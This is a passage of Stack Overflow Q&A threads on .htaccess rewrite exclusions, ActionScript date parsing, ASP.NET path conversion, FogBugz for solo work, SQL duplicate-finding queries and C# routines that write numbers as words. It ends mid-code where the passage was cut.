By default every request to /appRoot/* is being rewritten to be picked up by app/webroot/index.php, where it's being analysed and corresponding controller actions are being invoked. This is done by these directives in .htaccess:
RewriteBase /appRoot
RewriteRule ^$ app/webroot/ [L]
RewriteRule (.*) app/webroot/$1 [L]
I now want to exclude a few directories like static/ from this rewriting. I tried with this before the Cake RewriteRules:
RewriteCond $1 ^(static|otherDir).*$ [NC]
RewriteRule (.*) - [L]
It works insofar as requests are no longer rewritten, but now all requests are being skipped, even legitimate Cake requests which should not match ^(static|otherDir).*$.
I tried several variations of these rules but can't get it to work the way I want.
A: And the correct answer iiiiis...
RewriteRule ^(a|bunch|of|old|directories).* - [NC,L]
# all other requests will be forwarded to Cake
RewriteRule ^$ app/webroot/ [L]
RewriteRule (.*) app/webroot/$1 [L]
I still don't get why the index.php file in the root directory was called initially even with these directives in place. It is now located in
/appRoot/app/views/pages/home.ctp
and handled through Cake as well. With this in place now, I suppose this would have worked as well (slightly altered version of Mike's suggestion, untested):
RewriteCond $1 !^(a|bunch|of|old|directories).*$ [NC]
RewriteRule ^(.*)$ app/webroot/$1 [L]
A: Remove the [L] from the previous rules:
RewriteBase /appRoot
RewriteRule ^$ app/webroot/
RewriteRule (.*) app/webroot/$1
[L] means "Stop the rewriting process here and don't apply any more rewriting rules."
A: Could you not apply the condition to the following rules, but with negation, as in (with some variation thereof, I'm not too good at remembering .htaccess rules, so the flags might be wrong):
RewriteCond $1 !^(static|otherDir).*$ [NC]
RewriteRule ^$ app/webroot/ [L]
RewriteCond $1 !^(static|otherDir).*$ [NC]
RewriteRule (.*) app/webroot/$1 [L]
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3157",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "22"
} |
Q: Actionscript 3 - Fastest way to parse yyyy-mm-dd hh:mm:ss to a Date object? I have been trying to find a really fast way to parse yyyy-mm-dd [hh:mm:ss] into a Date object. Here are the 3 ways I have tried doing it and the times it takes each method to parse 50,000 date time strings.
Does anyone know any faster ways of doing this or tips to speed up the methods?
castMethod1 takes 3673 ms
castMethod2 takes 3812 ms
castMethod3 takes 3931 ms
Code:
private function castMethod1(dateString:String):Date {
if ( dateString == null ) {
return null;
}
var year:int = int(dateString.substr(0,4));
var month:int = int(dateString.substr(5,2))-1;
var day:int = int(dateString.substr(8,2));
if ( year == 0 && month == 0 && day == 0 ) {
return null;
}
if ( dateString.length == 10 ) {
return new Date(year, month, day);
}
var hour:int = int(dateString.substr(11,2));
var minute:int = int(dateString.substr(14,2));
var second:int = int(dateString.substr(17,2));
return new Date(year, month, day, hour, minute, second);
}
-
private function castMethod2(dateString:String):Date {
if ( dateString == null ) {
return null;
}
if ( dateString.indexOf("0000-00-00") != -1 ) {
return null;
}
dateString = dateString.split("-").join("/");
return new Date(Date.parse( dateString ));
}
-
private function castMethod3(dateString:String):Date {
if ( dateString == null ) {
return null;
}
var mainParts:Array = dateString.split(" ");
var dateParts:Array = mainParts[0].split("-");
if ( Number(dateParts[0])+Number(dateParts[1])+Number(dateParts[2]) == 0 ) {
return null;
}
return new Date( Date.parse( dateParts.join("/")+(mainParts[1]?" "+mainParts[1]:" ") ) );
}
No, Date.parse will not handle dashes by default. And I need to return null for date time strings like "0000-00-00".
A: This was the fastest I could come up with after some fiddling:
private function castMethod4(dateString:String):Date {
if ( dateString == null )
return null;
if ( dateString.length != 10 && dateString.length != 19)
return null;
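// note: String.replace() with a String argument only replaces the first match, hence the two identical calls below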
dateString = dateString.replace("-", "/");
dateString = dateString.replace("-", "/");
return new Date(Date.parse( dateString ));
}
I get 50k iterations in about 470ms for castMethod2() on my computer and 300 ms for my version (that's the same amount of work done in 63% of the time). I'd definitely say both are "Good enough" unless you're parsing silly amounts of dates.
A: I'm guessing Date.Parse() doesn't work?
A: I've been using the following snipplet to parse UTC date strings:
private function parseUTCDate( str : String ) : Date {
var matches : Array = str.match(/(\d\d\d\d)-(\d\d)-(\d\d) (\d\d):(\d\d):(\d\d)Z/);
var d : Date = new Date();
d.setUTCFullYear(int(matches[1]), int(matches[2]) - 1, int(matches[3]));
d.setUTCHours(int(matches[4]), int(matches[5]), int(matches[6]), 0);
return d;
}
Just remove the time part and it should work fine for your needs:
private function parseDate( str : String ) : Date {
var matches : Array = str.match(/(\d\d\d\d)-(\d\d)-(\d\d)/);
var d : Date = new Date();
d.setUTCFullYear(int(matches[1]), int(matches[2]) - 1, int(matches[3]));
return d;
}
No idea about the speed, I haven't been worried about that in my applications. 50K iterations in significantly less than a second on my machine.
A: Well then method 2 seems the best way:
private function castMethod2(dateString:String):Date {
if ( dateString == null ) {
return null;
}
if ( dateString.indexOf("0000-00-00") != -1 ) {
return null;
}
dateString = dateString.split("-").join("/");
return new Date(Date.parse( dateString ));
}
A: Because Date.parse() does not accept all possible formats, we can preformat the passed dateString value using DateFormatter with a formatString that Date.parse() can understand, e.g.
// English formatter
var stringValue:String = "2010.10.06";
var dateCommonFormatter : DateFormatter = new DateFormatter();
dateCommonFormatter.formatString = "YYYY/MM/DD";
var formattedStringValue : String = dateCommonFormatter.format(stringValue);
var dateFromString : Date = new Date(Date.parse(formattedStringValue));
A: var strDate:String = "2013-01-24 01:02:40";
function dateParser(s:String):Date{
var regexp:RegExp = /(\d{4})\-(\d{1,2})\-(\d{1,2}) (\d{2})\:(\d{2})\:(\d{2})/;
var _result:Object = regexp.exec(s);
return new Date(
parseInt(_result[1]),
parseInt(_result[2])-1,
parseInt(_result[3]),
parseInt(_result[4]),
parseInt(_result[5]),
parseInt(_result[6])
);
}
var myDate:Date = dateParser(strDate);
A: Here is my implementation. Give this a try.
public static function dateToUtcTime(date:Date):String {
var tmp:Array = new Array();
var char:String;
var output:String = '';
// create format YYMMDDhhmmssZ
// ensure 2 digits are used for each entry, so a leading "0" is prefixed where needed
tmp.push(date.secondsUTC);
tmp.push(date.minutesUTC);
tmp.push(date.hoursUTC);
tmp.push(date.getUTCDate());
tmp.push(date.getUTCMonth() + 1); // months 0-11
tmp.push(date.getUTCFullYear() % 100);
for(var i:int=0; i < 6 /* 6 items pushed */; ++i) {
char = String(tmp.pop());
trace("char: " + char);
if(char.length < 2)
output += "0";
output += char;
}
output += 'Z';
return output;
}
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3163",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "24"
} |
Q: Absolute path back to web-relative path If I have managed to locate and verify the existence of a file using Server.MapPath and I now want to send the user directly to that file, what is the fastest way to convert that absolute path back into a relative web path?
A: Perhaps this might work:
String RelativePath = AbsolutePath.Replace(Request.ServerVariables["APPL_PHYSICAL_PATH"], String.Empty);
I'm using C#, but it could be adapted to VB.
A: I like the idea from Canoas. Unfortunately I had not "HttpContext.Current.Request" available (BundleConfig.cs).
I changed the methode like this:
public static string RelativePath(this HttpServerUtility srv, string path)
{
return path.Replace(HttpContext.Current.Server.MapPath("~/"), "~/").Replace(@"\", "/");
}
A: Wouldn't it be nice to have Server.RelativePath(path)?
Well, you just need to extend it ;-)
public static class ExtensionMethods
{
public static string RelativePath(this HttpServerUtility srv, string path, HttpRequest context)
{
return path.Replace(context.ServerVariables["APPL_PHYSICAL_PATH"], "~/").Replace(@"\", "/");
}
}
With this you can simply call
Server.RelativePath(path, Request);
A: If you used Server.MapPath, then you should already have the relative web path. According to the MSDN documentation, this method takes one variable, path, which is the virtual path of the Web server. So if you were able to call the method, you should already have the relative web path immediately accessible.
A: I know this is old but I needed to account for virtual directories (per @Costo's comment). This seems to help:
static string RelativeFromAbsolutePath(string path)
{
if(HttpContext.Current != null)
{
var request = HttpContext.Current.Request;
var applicationPath = request.PhysicalApplicationPath;
var virtualDir = request.ApplicationPath;
virtualDir = virtualDir == "/" ? virtualDir : (virtualDir + "/");
return path.Replace(applicationPath, virtualDir).Replace(@"\", "/");
}
throw new InvalidOperationException("We can only map an absolute back to a relative path if an HttpContext is available.");
}
A: For asp.net core i wrote helper class to get pathes in both directions.
public class FilePathHelper
{
private readonly IHostingEnvironment _env;
public FilePathHelper(IHostingEnvironment env)
{
_env = env;
}
public string GetVirtualPath(string physicalPath)
{
if (physicalPath == null) throw new ArgumentException("physicalPath is null");
if (!File.Exists(physicalPath)) throw new FileNotFoundException(physicalPath + " doesn't exist");
var lastWord = _env.WebRootPath.Split("\\").Last();
int relativePathIndex = physicalPath.IndexOf(lastWord) + lastWord.Length;
var relativePath = physicalPath.Substring(relativePathIndex);
return $"/{ relativePath.TrimStart('\\').Replace('\\', '/')}";
}
public string GetPhysicalPath(string relativepath)
{
if (relativepath == null) throw new ArgumentException("relativepath is null");
var fileInfo = _env.WebRootFileProvider.GetFileInfo(relativepath);
if (fileInfo.Exists) return fileInfo.PhysicalPath;
else throw new FileNotFoundException("file doesn't exists");
}
from Controller or service inject FilePathHelper and use:
var physicalPath = _fp.GetPhysicalPath("/img/banners/abro.png");
and versa
var virtualPath = _fp.GetVirtualPath(physicalPath);
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3164",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "66"
} |
Q: Anyone soloing using fogbugz? Is there anyone working solo and using fogbugz out there? I'm interested in personal experience/overhead versus paper.
I am involved in several projects and get pretty hammered with lots of details to keep track of... Any experience welcome.
(Yes I know Mr. Joel is on the stackoverflow team... I still want good answers :)
A: I use it as well and quite frankly wouldn't want to work without it.
I've always had some kind of issue tracker available for the projects I work on and thus am quite used to updating it. With FB6 the process is now even better.
Since FB also integrates with Subversion, the source control tool I use for my projects, the process is really good and I have two-way links between the two systems now. I can click on a case number in the Subversion logs and go to the case in FB, or see the revisions bound to a case inside FB.
A: I think it's great that Joel et al. let people use FogBugz hosted for free on their own. It's a great business strategy, because the users become fans (it is great software after all), and then they recommend it to their businesses or customers.
A: I use it, especially since the hosted Version of FugBugz is free for up to 2 people. I found it a lot nicer than paper as I'm working on multiple projects, and my paper tends to get rather messy once you start making annotations or if you want to re-organize and shuffle tasks around, mark them as complete only to see that they are not complete after all...
Plus, the Visual Studio integration is really neat, something paper just cannot compete with. Also, if you lay the project to rest for 6 months and come back, all your tasks and notes are still there, whereas with paper you may need to search all the old documents and notes again, if you did not discard it.
But that is just the point of view from someone who is not really good at staying organized :-) If you are a really tidy and organized person, paper may work better for you than it does for me.
Bonus suggestion: Run Fogbugz on a second PC (or a small Laptop like the eeePC) so that you always have it at your fingertips. The main problem with Task tracking programs - be it FogBugz, Outlook, Excel or just notepad - is that they take up screen space, and my two monitors are usually full with Visual Studio, e-Mail, Web Browsers, some Notepads etc.
A: Go to http://www.fogbugz.com/ then at the bottom under "Try It", sign up.
under Settings => Your FogBugz Hosted Account, it should either already say "Payment Information: Using Student and Startup Edition." or there should be some option/link to turn on the Student and Startup Edition.
And yes, it's not only for Students and Startups, I asked their support :-)
Disclaimer: I'm not affiliated with FogCreek and Joel did not just deposit money in my account.
A: When I was working for myself doing my consulting business I signed up for a hosted account and honestly I couldn't have done without it.
What I liked most about it was it took 30 seconds to sign up for an account and I was then able to integrate source control using sourcegear vault (which is an excellent source control product and free for single developers) set up projects, clients, releases and versions and monitor my progress constantly.
One thing that totally blew me away was that I ended up completely abandoning outlook for all work related correspondence. I could manage all my client interactions from within fogbugz and it all just worked amazingly well.
In terms of overhead, one of the nice things you could do was turn anything into a case. Anything that came up in your mind while you were coding, you simply created a new email, sent it to fogbugz and it was instantly added as an item for review later.
I would strongly recommend you get yourself one of the hosted accounts and give it a whirl
A: In addition to the benefits already mentioned, another nice feature of using FogBugz is BugzScout, which you can use to report errors from your app and log them into FogBugz automatically. If you're a one person team, chances are there are some bugs in your code you've never seen during your own testing, so it's nice to have those bugs found "in the wild" automatically reported and logged for you.
A: Yea FogBugz is great for process-light, quick and easy task management. It seems especially well suited for soloing, where you don't need or want a lot of complexity in that area.
By the way, if you want to keep track of what you're doing at the computer all day, check out TimeSprite, which integrates with FogBugz. It's a Windows app that logs your active window and then categorizes your activity based on the window title / activity type mappings you define as you go. (You can also just tell it what you're working on.) And if you're a FogBugz user, you can associate your work with a FogBugz case, and it will upload your time intervals for that case. This makes accurate recording of elapsed time pretty painless and about as accurate as you can get, which in turn improves FogBugz predictive powers in its evidence-based scheduling. Also, when soloing, I find that such specific logging of my time keeps me on task, in the way a meandering manager otherwise might. (I'm not affiliated with TimeSprite in any way.)
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3180",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "35"
} |
Q: SQL query, count and group by If I have data like this:
Key | Name
----+-----
1   | Dan
2   | Tom
3   | Jon
4   | Tom
5   | Sam
6   | Dan
What is the SQL query to bring back the records where Name is repeated 2 or more times?
So the result I would want is
Tom
Dan
A: Couldn't be simpler...
Select Name, Count(Name) As Count
From Table
Group By Name
Having Count(Name) > 1
Order By Count(Name) Desc
This could also be extended to delete duplicates:
Delete From Table
Where Key In (
Select Max(Key)
From Table
Group By Name
Having Count(Name) > 1
)
A: select name from table group by name having count(name) > 1
A: This could also be accomplished by joining the table with itself,
SELECT DISTINCT t1.name
FROM tbl t1
INNER JOIN tbl t2
ON t1.name = t2.name
WHERE t1.key != t2.key;
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3196",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "26"
} |
Q: Convert integers to written numbers Is there an efficient method of converting an integer into the written numbers, for example:
string Written = IntegerToWritten(21);
would return "Twenty One".
Is there any way of doing this that doesn't involve a massive look-up table?
A: This should work reasonably well:
public static class HumanFriendlyInteger
{
static string[] ones = new string[] { "", "One", "Two", "Three", "Four", "Five", "Six", "Seven", "Eight", "Nine" };
static string[] teens = new string[] { "Ten", "Eleven", "Twelve", "Thirteen", "Fourteen", "Fifteen", "Sixteen", "Seventeen", "Eighteen", "Nineteen" };
static string[] tens = new string[] { "Twenty", "Thirty", "Forty", "Fifty", "Sixty", "Seventy", "Eighty", "Ninety" };
static string[] thousandsGroups = { "", " Thousand", " Million", " Billion" };
private static string FriendlyInteger(int n, string leftDigits, int thousands)
{
if (n == 0)
{
return leftDigits;
}
string friendlyInt = leftDigits;
if (friendlyInt.Length > 0)
{
friendlyInt += " ";
}
if (n < 10)
{
friendlyInt += ones[n];
}
else if (n < 20)
{
friendlyInt += teens[n - 10];
}
else if (n < 100)
{
friendlyInt += FriendlyInteger(n % 10, tens[n / 10 - 2], 0);
}
else if (n < 1000)
{
friendlyInt += FriendlyInteger(n % 100, (ones[n / 100] + " Hundred"), 0);
}
else
{
friendlyInt += FriendlyInteger(n % 1000, FriendlyInteger(n / 1000, "", thousands+1), 0);
if (n % 1000 == 0)
{
return friendlyInt;
}
}
return friendlyInt + thousandsGroups[thousands];
}
public static string IntegerToWritten(int n)
{
if (n == 0)
{
return "Zero";
}
else if (n < 0)
{
return "Negative " + IntegerToWritten(-n);
}
return FriendlyInteger(n, "", 0);
}
}
(Edited to fix a bug w/ million, billion, etc.)
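A quick usage sketch, assuming the class above:
Console.WriteLine(HumanFriendlyInteger.IntegerToWritten(21));      // Twenty One
Console.WriteLine(HumanFriendlyInteger.IntegerToWritten(1000000)); // One Million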
A: Why a massive lookup table?
string GetWrittenInteger(int n)
{
string[] a = new string[] {"One", "Two", "Three", "Four", "Five", "Six", "Seven", "Eight", "Nine" };
string[] b = new string[] { "Ten", "Eleven", "Twelve", "Thirteen", "Fourteen", "Fifteen", "Sixteen", "Seventeen", "Eighteen", "Nineteen" };
string[] c = new string[] {"Twenty", "Thirty", "Forty", "Fifty", "Sixty", "Seventy", "Eighty", "Ninety"};
string[] d = new string[] {"Hundred", "Thousand", "Million"};
string s = n.ToString();
for (int i = 0; i < s.Length; i++)
{
// logic (too lazy but you get the idea)
}
}
A: I use this handy library called Humanizer.
https://github.com/Humanizr/Humanizer
It supports several cultures and converts not only numbers to words but also date and it's very simple to use.
Here's how I use it:
int someNumber = 543;
var culture = new System.Globalization.CultureInfo("en-US");
var result = someNumber.ToWords(culture); // 543 -> five hundred forty-three
And voilà!
A: using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
namespace tryingstartfror4digits
{
class Program
{
static void Main(string[] args)
{
Program pg = new Program();
Console.WriteLine("Enter ur number");
int num = Convert.ToInt32(Console.ReadLine());
if (num <= 19)
{
string g = pg.first(num);
Console.WriteLine("The number is " + g);
}
else if ((num >= 20) && (num <= 99))
{
if (num % 10 == 0)
{
string g = pg.second(num / 10);
Console.WriteLine("The number is " + g);
}
else
{
string g = pg.second(num / 10) + pg.first(num % 10);
Console.WriteLine("The number is " + g);
}
}
else if ((num >= 100) && (num <= 999))
{
int k = num % 100;
string g = pg.first(num / 100) + pg.third(num / 100) + pg.second(k / 10) + pg.first(k % 10);
Console.WriteLine("The number is " + g);
}
else if ((num >= 1000) && (num <= 19999))
{
int h = num % 1000;
int k = h % 100;
string g = pg.first(num / 1000) + "Thousand " + pg.first(h / 100) + pg.third(h / 100) + pg.second(k / 10) + pg.first(k % 10);
Console.WriteLine("The number is " + g);
}
Console.ReadLine();
}
public string first(int num)
{
string name;
if (num == 0)
{
name = " ";
}
else
{
string[] arr1 = new string[] { "One", "Two", "Three", "Four", "Five", "Six", "Seven", "Eight", "Nine" , "Ten", "Eleven", "Twelve", "Thirteen", "Fourteen", "Fifteen", "Sixteen", "Seventeen", "Eighteen", "Nineteen"};
name = arr1[num - 1] + " ";
}
return name;
}
public string second(int num)
{
string name;
if ((num == 0)||(num==1))
{
name = " ";
}
else
{
string[] arr1 = new string[] { "Twenty", "Thirty", "Forty", "Fifty", "Sixty", "Seventy", "Eighty", "Ninety" };
name = arr1[num - 2] + " ";
}
return name;
}
public string third(int num)
{
string name ;
if (num == 0)
{
name = "";
}
else
{
string[] arr1 = new string[] { "Hundred" };
name = arr1[0] + " ";
}
return name;
}
}
}
this works fine from 1 to 19999 will update soon after i complete it
A: The accepted answer doesn't seem to work perfectly. It doesn't handle dashes in numbers like twenty-one, it doesn't put the word "and" in for numbers like "one hundred and one", and, well, it is recursive.
Here is my shot at the answer. It adds the "and" word intelligently, and hyphenates numbers appropriately. Let me know if any modifications are needed.
Here is how to call it (obviously you will want to put this in a class somewhere):
for (int i = int.MinValue+1; i < int.MaxValue; i++)
{
Console.WriteLine(ToWords(i));
}
Here is the code:
private static readonly string[] Ones = {"", "One", "Two", "Three", "Four", "Five", "Six", "Seven", "Eight", "Nine"};
private static readonly string[] Teens =
{
"Ten", "Eleven", "Twelve", "Thirteen", "Fourteen", "Fifteen", "Sixteen",
"Seventeen", "Eighteen", "Nineteen"
};
private static readonly string[] Tens =
{
"", "", "Twenty", "Thirty", "Forty", "Fifty", "Sixty", "Seventy", "Eighty",
"Ninety"
};
public static string ToWords(int number)
{
if (number == 0)
return "Zero";
var wordsList = new List<string>();
if (number < 0)
{
wordsList.Add("Negative");
number = Math.Abs(number);
}
if (number >= 1000000000 && number <= int.MaxValue) //billions
{
int billionsValue = number / 1000000000;
GetValuesUnder1000(billionsValue, wordsList);
wordsList.Add("Billion");
number -= billionsValue * 1000000000;
if (number > 0 && number < 10)
wordsList.Add("and");
}
if (number >= 1000000 && number < 1000000000) //millions
{
int millionsValue = number / 1000000;
GetValuesUnder1000(millionsValue, wordsList);
wordsList.Add("Million");
number -= millionsValue * 1000000;
if (number > 0 && number < 10)
wordsList.Add("and");
}
if (number >= 1000 && number < 1000000) //thousands
{
int thousandsValue = number/1000;
GetValuesUnder1000(thousandsValue, wordsList);
wordsList.Add("Thousand");
number -= thousandsValue * 1000;
if (number > 0 && number < 10)
wordsList.Add("and");
}
GetValuesUnder1000(number, wordsList);
return string.Join(" ", wordsList);
}
private static void GetValuesUnder1000(int number, List<string> wordsList)
{
while (number != 0)
{
if (number < 10)
{
wordsList.Add(Ones[number]);
number -= number;
}
else if (number < 20)
{
wordsList.Add(Teens[number - 10]);
number -= number;
}
else if (number < 100)
{
int tensValue = ((int) (number/10))*10;
int onesValue = number - tensValue;
if (onesValue == 0)
{
wordsList.Add(Tens[tensValue/10]);
}
else
{
wordsList.Add(Tens[tensValue/10] + "-" + Ones[onesValue]);
}
number -= tensValue;
number -= onesValue;
}
else if (number < 1000)
{
int hundredsValue = ((int) (number/100))*100;
wordsList.Add(Ones[hundredsValue/100]);
wordsList.Add("Hundred");
number -= hundredsValue;
if (number > 0)
wordsList.Add("and");
}
}
}
A: I use this code.It is VB code but you can easily translate it to C#. It works
Function NumberToText(ByVal n As Integer) As String
Select Case n
Case 0
Return ""
Case 1 To 19
Dim arr() As String = {"One","Two","Three","Four","Five","Six","Seven", _
"Eight","Nine","Ten","Eleven","Twelve","Thirteen","Fourteen", _
"Fifteen","Sixteen","Seventeen","Eighteen","Nineteen"}
Return arr(n-1) & " "
Case 20 to 99
Dim arr() as String = {"Twenty","Thirty","Forty","Fifty","Sixty","Seventy","Eighty","Ninety"}
Return arr(n\10 -2) & " " & NumberToText(n Mod 10)
Case 100 to 199
Return "One Hundred " & NumberToText(n Mod 100)
Case 200 to 999
Return NumberToText(n\100) & "Hundred " & NumberToText(n Mod 100)
Case 1000 to 1999
Return "One Thousand " & NumberToText(n Mod 1000)
Case 2000 to 999999
Return NumberToText(n\1000) & "Thousand " & NumberToText(n Mod 1000)
Case 1000000 to 1999999
Return "One Million " & NumberToText(n Mod 1000000)
Case 1000000 to 999999999
Return NumberToText(n\1000000) & "Million " & NumberToText(n Mod 1000000)
Case 1000000000 to 1999999999
Return "One Billion " & NumberTotext(n Mod 1000000000)
Case Else
Return NumberToText(n\1000000000) & "Billion " _
& NumberToText(n mod 1000000000)
End Select
End Function
Here is the code in c#
public static string AmountInWords(double amount)
{
var n = (int)amount;
if (n == 0)
return "";
else if (n > 0 && n <= 19)
{
var arr = new string[] { "One", "Two", "Three", "Four", "Five", "Six", "Seven", "Eight", "Nine", "Ten", "Eleven", "Twelve", "Thirteen", "Fourteen", "Fifteen", "Sixteen", "Seventeen", "Eighteen", "Nineteen" };
return arr[n - 1] + " ";
}
else if (n >= 20 && n <= 99)
{
var arr = new string[] { "Twenty", "Thirty", "Forty", "Fifty", "Sixty", "Seventy", "Eighty", "Ninety" };
return arr[n / 10 - 2] + " " + AmountInWords(n % 10);
}
else if (n >= 100 && n <= 199)
{
return "One Hundred " + AmountInWords(n % 100);
}
else if (n >= 200 && n <= 999)
{
return AmountInWords(n / 100) + "Hundred " + AmountInWords(n % 100);
}
else if (n >= 1000 && n <= 1999)
{
return "One Thousand " + AmountInWords(n % 1000);
}
else if (n >= 2000 && n <= 999999)
{
return AmountInWords(n / 1000) + "Thousand " + AmountInWords(n % 1000);
}
else if (n >= 1000000 && n <= 1999999)
{
return "One Million " + AmountInWords(n % 1000000);
}
else if (n >= 1000000 && n <= 999999999)
{
return AmountInWords(n / 1000000) + "Million " + AmountInWords(n % 1000000);
}
else if (n >= 1000000000 && n <= 1999999999)
{
return "One Billion " + AmountInWords(n % 1000000000);
}
else
{
return AmountInWords(n / 1000000000) + "Billion " + AmountInWords(n % 1000000000);
}
}
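A quick sanity check of the C# version (note the trailing space the recursion leaves behind):
Console.WriteLine(AmountInWords(1234)); // "One Thousand Two Hundred Thirty Four "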
A: Here is a C# Console Application that will return whole numbers as well as decimals.
A: Just the Turkish version of the HumanFriendlyInteger class above (↑), i.e. Turkish number-to-words:
public static class HumanFriendlyInteger
{
static string[] ones = new string[] { "", "Bir", "İki", "Üç", "Dört", "Beş", "Altı", "Yedi", "Sekiz", "Dokuz" };
static string[] teens = new string[] { "On", "On Bir", "On İki", "On Üç", "On Dört", "On Beş", "On Altı", "On Yedi", "On Sekiz", "On Dokuz" };
static string[] tens = new string[] { "Yirmi", "Otuz", "Kırk", "Elli", "Altmış", "Yetmiş", "Seksen", "Doksan" };
static string[] thousandsGroups = { "", " Bin", " Milyon", " Milyar" };
private static string FriendlyInteger(int n, string leftDigits, int thousands)
{
if (n == 0)
{
return leftDigits;
}
string friendlyInt = leftDigits;
if (friendlyInt.Length > 0)
{
friendlyInt += " ";
}
if (n < 10)
friendlyInt += ones[n];
else if (n < 20)
friendlyInt += teens[n - 10];
else if (n < 100)
friendlyInt += FriendlyInteger(n % 10, tens[n / 10 - 2], 0);
else if (n < 1000)
friendlyInt += FriendlyInteger(n % 100, ((n / 100 == 1 ? "" : ones[n / 100] + " ") + "Yüz"), 0); // in Turkish, "Yüz" (hundred) is not preceded by "Bir" (one)
else
friendlyInt += FriendlyInteger(n % 1000, FriendlyInteger(n / 1000, "", thousands + 1), 0);
return friendlyInt + thousandsGroups[thousands];
}
public static string IntegerToWritten(int n)
{
if (n == 0)
return "Sıfır";
else if (n < 0)
return "Eksi " + IntegerToWritten(-n);
return FriendlyInteger(n, "", 0);
    }
}
A: Just get the string from the textbox and convert it, like so:
string s = txtNumber.Text;
int i = Convert.ToInt32(s);
This only gives you the whole integer value to feed into one of the conversion routines above.
A: An extension of Nick Masao's answer to the same problem, for Bengali numerals. The initial input is a Unicode string. Cheers!!
string number = "২২৮৯";
number = number.Replace("০", "0").Replace("১", "1").Replace("২", "2").Replace("৩", "3").Replace("৪", "4").Replace("৫", "5").Replace("৬", "6").Replace("৭", "7").Replace("৮", "8").Replace("৯", "9");
double vtempdbl = Convert.ToDouble(number);
string amount = AmountInWords(vtempdbl);
private static string AmountInWords(double amount)
{
var n = (int)amount;
if (n == 0)
return " ";
else if (n > 0 && n <= 99)
{
var arr = new string[] { "এক", "দুই", "তিন", "চার", "পাঁচ", "ছয়", "সাত", "আট", "নয়", "দশ", "এগার", "বারো", "তের", "চৌদ্দ", "পনের", "ষোল", "সতের", "আঠার", "ঊনিশ", "বিশ", "একুশ", "বাইস", "তেইশ", "চব্বিশ", "পঁচিশ", "ছাব্বিশ", "সাতাশ", "আঠাশ", "ঊনত্রিশ", "ত্রিশ", "একত্রিস", "বত্রিশ", "তেত্রিশ", "চৌত্রিশ", "পঁয়ত্রিশ", "ছত্রিশ", "সাঁইত্রিশ", "আটত্রিশ", "ঊনচল্লিশ", "চল্লিশ", "একচল্লিশ", "বিয়াল্লিশ", "তেতাল্লিশ", "চুয়াল্লিশ", "পয়তাল্লিশ", "ছিচল্লিশ", "সাতচল্লিশ", "আতচল্লিশ", "উনপঞ্চাশ", "পঞ্চাশ", "একান্ন", "বায়ান্ন", "তিপ্পান্ন", "চুয়ান্ন", "পঞ্চান্ন", "ছাপ্পান্ন", "সাতান্ন", "আটান্ন", "উনষাট", "ষাট", "একষট্টি", "বাষট্টি", "তেষট্টি", "চৌষট্টি", "পয়ষট্টি", "ছিষট্টি", " সাতষট্টি", "আটষট্টি", "ঊনসত্তর ", "সত্তর", "একাত্তর ", "বাহাত্তর", "তেহাত্তর", "চুয়াত্তর", "পঁচাত্তর", "ছিয়াত্তর", "সাতাত্তর", "আটাত্তর", "ঊনাশি", "আশি", "একাশি", "বিরাশি", "তিরাশি", "চুরাশি", "পঁচাশি", "ছিয়াশি", "সাতাশি", "আটাশি", "উননব্বই", "নব্বই", "একানব্বই", "বিরানব্বই", "তিরানব্বই", "চুরানব্বই", "পঁচানব্বই ", "ছিয়ানব্বই ", "সাতানব্বই", "আটানব্বই", "নিরানব্বই" };
return arr[n - 1] + " ";
}
else if (n >= 100 && n <= 199)
{
return AmountInWords(n / 100) + "এক শত " + AmountInWords(n % 100);
}
else if (n >= 100 && n <= 999)
{
return AmountInWords(n / 100) + "শত " + AmountInWords(n % 100);
}
else if (n >= 1000 && n <= 1999)
{
return "এক হাজার " + AmountInWords(n % 1000);
}
else if (n >= 1000 && n <= 99999)
{
return AmountInWords(n / 1000) + "হাজার " + AmountInWords(n % 1000);
}
else if (n >= 100000 && n <= 199999)
{
return "এক লাখ " + AmountInWords(n % 100000);
}
else if (n >= 100000 && n <= 9999999)
{
return AmountInWords(n / 100000) + "লাখ " + AmountInWords(n % 100000);
}
else if (n >= 10000000 && n <= 19999999)
{
return "এক কোটি " + AmountInWords(n % 10000000);
}
else
{
return AmountInWords(n / 10000000) + "কোটি " + AmountInWords(n % 10000000);
}
}
A: The following C# console app code will accepts a monetary value in numbers up to 2 decimals and prints it in English. This not only converts integer to its English equivalent but as a monetary value in dollars and cents.
namespace ConsoleApplication2
{
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text.RegularExpressions;
class Program
{
static void Main(string[] args)
{
bool repeat = true;
while (repeat)
{
string inputMonetaryValueInNumberic = string.Empty;
string centPart = string.Empty;
string dollarPart = string.Empty;
Console.Write("\nEnter the monetary value : ");
inputMonetaryValueInNumberic = Console.ReadLine();
inputMonetaryValueInNumberic = inputMonetaryValueInNumberic.TrimStart('0');
if (ValidateInput(inputMonetaryValueInNumberic))
{
if (inputMonetaryValueInNumberic.Contains('.'))
{
centPart = ProcessCents(inputMonetaryValueInNumberic.Substring(inputMonetaryValueInNumberic.IndexOf(".") + 1));
dollarPart = ProcessDollar(inputMonetaryValueInNumberic.Substring(0, inputMonetaryValueInNumberic.IndexOf(".")));
}
else
{
dollarPart = ProcessDollar(inputMonetaryValueInNumberic);
}
centPart = string.IsNullOrWhiteSpace(centPart) ? string.Empty : " and " + centPart;
Console.WriteLine(string.Format("\n\n{0}{1}", dollarPart, centPart));
}
else
{
Console.WriteLine("Invalid Input..");
}
Console.WriteLine("\n\nPress any key to continue or Escape of close : ");
var loop = Console.ReadKey();
repeat = !loop.Key.ToString().Contains("Escape");
Console.Clear();
}
}
private static string ProcessCents(string cents)
{
string english = string.Empty;
string dig3 = Process3Digit(cents);
if (!string.IsNullOrWhiteSpace(dig3))
{
dig3 = string.Format("{0} {1}", dig3, GetSections(0));
}
english = dig3 + english;
return english;
}
private static string ProcessDollar(string dollar)
{
string english = string.Empty;
foreach (var item in Get3DigitList(dollar))
{
string dig3 = Process3Digit(item.Value);
